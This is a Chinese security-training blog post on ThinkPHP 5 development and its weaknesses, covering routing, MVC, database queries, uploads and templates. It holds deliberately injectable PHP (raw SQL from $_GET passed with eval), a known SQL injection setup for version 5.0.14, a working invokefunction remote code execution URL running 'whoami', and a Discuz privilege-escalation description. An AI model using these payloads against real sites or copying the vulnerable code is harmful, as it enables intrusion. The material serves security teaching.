当前位置：首页 > news >正文

第27天安全开发-PHP应用TP 框架路由访问对象操作内置过滤绕过核心漏洞

news 来源：原创 2025/7/30 13:51:17

时间轴

演示案例

TP 框架-开发-配置架构&路由&MVC 模型

TP 框架-安全-不安全写法&版本过滤绕过

TP 框架-开发-配置架构&路由&MVC 模型

参考： https://www.kancloud.cn/manual/thinkphp5_1

1、配置架构-导入使用

去thinkphp官网可以看到，目前最新的版本是更新到了thinkphp8.0，但是本次演示案例用到的都是thinkphp5.1版本。

在使用一套框架之前，首先需要从官网导入源码，例如下图，将它导入到demo01文件夹下。

可以在ThinkPHP—>thinkphp—>base.php中查看当前框架的版本。

在使用框架进行开发以前，需要先解析目录（不能直接访问），在phpstudy中将它指向ThinkPHP下的public目录

接下来尝试用ip访问，可以看到

在刚才public路径下可以看到一个index.php文件，其中又定义了一个应用目录application，在官网手册中也可以看到index.php是入口文件。

找到application—>index—>controller下的index.php，尝试修改其中的代码，看看回显出来的页面是否也会改变。

把代码改成下图中的内容：

可以看到网页回显123

2、路由访问-URL 访问

通过下图，可以看到模块指的就是application下的index目录，控制器指的是index目录下的index.php，操作指index.php中的function index()。因此也就可以用ip/index.php/index/index来访问。

当增加一个操作xiaodi，就可以用ip/index.php/index/index/xiaodi来访问

可以认定为：ip/index.php(在index文件下的)/index（目录）/index（文件）/index（函数）

非官方写法访问方式

当使用非官方的写法访问时，可以看到只能用?x=1来访问，而当使用/x/1时访问报错。

官方写法访问方式

当使用官方写法访问时，?name=12可以访问，/name/12也可以访问

<?php
namespace app\index\controller;
use think\Controller;
use think\Request;class Index extends Controller
{public function index(){return '123';}public function xiaodi(){return $this->request->param('name');}}
?>

MVC模型

对应model（模板） view（视图） controller（控制器）

其中核心代码文件在controller中

3、数据库操作-应用对象

连接数据库

首先在application下找到database.php文件

修改database（数据库名）为demo01，username为root，密码123456，端口号3306，其余根据自己需求修改。

查询数据库

在navicat中找到之前创建的news表格

在ThinkPHP—>application下新建一个test文件夹，并在这个文件夹下创建controller文件夹，其中包含Test.php

非官方写法

以之前的news.php为例

<?php
include 'config.php';
//读取news.html中的内容
$template=file_get_contents('news.html');$id=$_GET['id'] ?? '1';
$sql="select * from news where id=$id";
echo $sql;
$data=mysqli_query($con,$sql);
while($row=mysqli_fetch_row($data)){$page_title=$row[1];$heading=$row[2];$subheading=$row[3];$content=$row[4];$item=$row[5];
}$template=str_replace('{page_title}',$page_title,$template);
$template=str_replace('{heading}',$heading,$template);
$template=str_replace('{subheading}',$subheading,$template);
$template=str_replace('{content}',$content,$template);
$template=str_replace('{$item}',$item,$template);eval('?>'.$template);
//eval函数会将传递给它的字符串作为PHP代码执行，即将?>连接到$template的开头，再执行该字符串
?>

当执行?id=1 and 1=1时，可以看到这个值会被接收

当输入?id=2时会出现报错

官方写法

<?php
namespace app\Test\controller;
use think\Db;
use think\Controller;class Test extends Controller
{public function testsql(){//使用tp框架操作mysql数据库//SELECT * FROM `think_user` WHERE  `id` = 1 LIMIT 1//规矩写法$id = request()->param('x');$data = Db::table('news')->where('id', $id)->find();return json($data);}
}
?>

当输入ip/index.php/test/test/testsql/x/1去查询这个数据库的时候，页面可以正常回显

并且可以发现，在/x/1后面输入任何东西都不会显示在页面上

结论

1.使用TP框架操作数据库时，默认是受到框架内置过滤保护的，而且方便开发。

2.原生态的数据库操作如果没有过滤就会受到SQL注入攻击。

4、文件上传操作-应用对象

首先在ThinkPHP—>public文件夹下新建一个upload.html，其中代码为

<form action="/index.php/test/test/upload" enctype="multipart/form-data" method="post"><input type="file" name="image" /> <br><input type="submit" value="上传" />
</form>

Test.php中代码改为

<?php
namespace app\Test\controller;
use think\Db;
use think\Controller;class Test extends Controller
{   public function testsql(){//使用tp框架操作mysql数据库//SELECT * FROM `think_user` WHERE  `id` = 1 LIMIT 1//规矩写法
//    $id=request()->param('x');
//      $data=Db::table('news')->where('id',$id)->find();//原生写法 有安全隐患//$id=request()->param('x');//$data=Db::query("select * from news where id=$id");$username = request()->get('username/a');db('admin')->insert(['username' => $username]);return 'Update success';//return json($data);
}public function upload(){// 获取表单上传文件 例如上传了001.jpg$file = request()->file('image');//获取表单上传文件// 移动到框架应用根目录/uploads/ 目录下$info = $file->validate(['size'=>1567800,'ext'=>'jpg,png,gif'])->move( '../uploads');if($info){// 成功上传后 获取上传信息// 输出 jpgecho $info->getExtension();// 输出 20160820/42a79759f284b767dfcb2a0197904287.jpgecho $info->getSaveName();// 输出 42a79759f284b767dfcb2a0197904287.jpgecho $info->getFilename();}else{// 上传失败获取错误信息echo $file->getError();}}
}

在ThinkPHP下创建uploads文件夹，用来存储接收的文件

由于phpstudy中的根目录就是public文件夹，因此可以直接用ip/upload.php来访问

当尝试上传图片时，就会跳转到以下页面

而当上传txt、docx等文件时，就会提醒文件后缀不允许

5、前端页面渲染-MVC 模型

在ThinkPHP—>application—>index下创建view文件夹，再在view下创建index文件夹，其中包含index.html和edit.html。

edit.html代码如下：

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><title>sabiqudi</title>
</head>
<body>
kcnnqi
</body>
</html>

index.html代码如下：

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><title>{$name}</title>
</head>
<body>
{$email}
</body>
</html>

index.php代码如下：

<?php
namespace app\index\controller;
use think\Request;
use think\Controller;class Index extends Controller
{   public function index(){//return 123;$this->assign('name','ThinkPHP');$this->assign('email','thinkphp@qq.com');// 或者批量赋值$this->assign(['name'  => 'ThinkPHP','email' => 'thinkphp@qq.com']);// 模板输出return $this->fetch('');//更改要渲染的页面
}
}

当index.php中为return $this->fetch('');时，默认渲染index.html，访问后页面如下：

当index.php中为return $this->fetch('edit');时，渲染edit.html，访问后页面如下：

TP 框架-安全-不安全写法&版本过滤绕过

1、内置代码写法

例子：不合规的代码写法-TP5-自写

当使用原生写法时，可以看到x后的内容被改变后仍然可以执行

而用规矩写法时，无论在x后输入什么，页面都不会改变

也就是分为官方规矩写法、用了一半安全写法、纯原生写法三种类型。

2、框架版本安全

例子 1：写法内置安全绕过-TP5-SQL 注入

参考文章：https://www.cnblogs.com/Yhck/p/15808056.html

可以看到，由于这个漏洞出现的版本是5.0.13-5.0.15，5.1.0-5.1.5，所以后续会用到5.0.14版本进行演示。下面先用5.0.22版本做一个对比。

由于5.0.22版本不在漏洞适用范围之内，可以看到页面返回为null

之后用5.0.14版本演示，先在phpstudy中更改路径为5.0.14中的public文件夹

为了看是否指向正确，可以让代码输出123来检验

<?php
namespace app\index\controller;class Index
{public function index(){echo 123;}
}

之后也是配置数据库

将index.php中的代码改为

<?php
namespace app\index\controller;class Index
{public function index(){$username = request()->get('username/a');db('users')->where("id")->update(['username'=> $username]);}
}

按照下面的命令访问

发现虽然报错，但是直接爆出了数据库名demo01

例子 2：内置版本安全漏洞-TP5-代码执行

以当前版本5.0.22为例

在ip后面输入/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami，可以得到：

因此可以得到结论，用纯原生写法或者用一半的安全写法都不是安全的，用官方写法看似安全，但如果使用的版本本身存在漏洞，也可以利用这个漏洞进行攻击。

逻辑越权（类似于linux中的用户等级）

如下图，假设管理员的uid=1，普通会员的uid=100。当使用select * from users where username=‘admin’来取出uid结果时，如果uid=1，则展示管理员页面。

而在逻辑越权时，经常需要修改用户id编号，这个id编号也就类似于uid。当把uid=100修改成了uid=1，也就使普通用户变成了管理员，即实现了权限地跨越。

当使用discuz注册一个用户时，可以看到有adminid和groupid，系统就是以这两个来区分管理员和普通用户。当修改adminid=1、groupid=1后，就可以实现逻辑越权，从普通用户变成管理员。

本文章由李豆豆喵和番薯小羊卷~共同完成。

时间轴

演示案例

TP 框架-开发-配置架构&路由&MVC 模型

1、配置架构-导入使用

2、路由访问-URL 访问

非官方写法访问方式

官方写法访问方式

MVC模型

3、数据库操作-应用对象

连接数据库

查询数据库

非官方写法

官方写法

结论

4、文件上传操作-应用对象

5、前端页面渲染-MVC 模型

TP 框架-安全-不安全写法&版本过滤绕过

1、内置代码写法

例子：不合规的代码写法-TP5-自写

2、框架版本安全

例子 1：写法内置安全绕过-TP5-SQL 注入

例子 2：内置版本安全漏洞-TP5-代码执行

逻辑越权（类似于linux中的用户等级）

相关文章：